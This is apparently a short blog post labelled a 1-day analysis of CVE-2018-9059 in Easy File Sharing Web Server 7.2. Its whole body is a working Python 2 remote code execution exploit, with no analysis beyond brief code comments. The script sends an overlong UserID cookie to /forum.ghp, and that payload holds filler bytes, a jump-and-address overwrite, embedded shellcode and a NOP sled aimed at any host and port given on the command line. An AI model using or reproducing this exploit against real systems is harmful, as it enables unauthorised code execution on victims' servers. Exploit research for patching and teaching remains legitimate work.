ii4gsp
[1-day Analysis] CVE-2018-9059 - Easy File Sharing Web Server 7.2 Exploit (RCE)
ii4gsp 2021. 1. 25. 19:44

```python
# Python 2 script (print statements, byte-oriented str).
import socket
import struct
import sys


def exploit(HOST, PORT):
    # Shellcode bytes as published on the page.
    shellcode = (
        "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
        "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
        "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
        "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
        "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
        "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
        "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
        "\x1c\x39\xbd"
    )

    # Overlong value placed in the UserID cookie.
    payload = ''
    payload += 'A' * 4059                       # filler
    # Bytes eb 06 90 90: short jump over the next 6 bytes, then two NOPs.
    payload += struct.pack("<I", 0x909006eb)
    # 32-bit little-endian address used by the exploit.
    payload += struct.pack("<I", 0x100103fe)
    payload += shellcode
    payload += '\x90' * 200                     # trailing NOP padding

    # HTTP request to /forum.ghp carrying the payload in the Cookie header.
    buffer = (
        "GET /forum.ghp HTTP/1.1\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Host:" + HOST + ":" + str(PORT) + "\r\n"
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        "Accept-Language: en-us\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Referer: http://" + HOST + "/\r\n"
        "Cookie: SESSIONID=22484; UserID=" + payload + "; PassWD=;\r\n"
        "Conection: Keep-Alive\r\n\r\n"
    )

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        s.send(buffer)
        s.close()
        print '[+] Exploit'
    except Exception:
        print '[-] Exploit Failed'


if __name__ == '__main__':
    # Both HOST and PORT are required.
    if len(sys.argv) < 3:
        print '[-] python2 exploit.py [HOST] [PORT]'
        sys.exit(1)
    exploit(sys.argv[1], int(sys.argv[2]))
```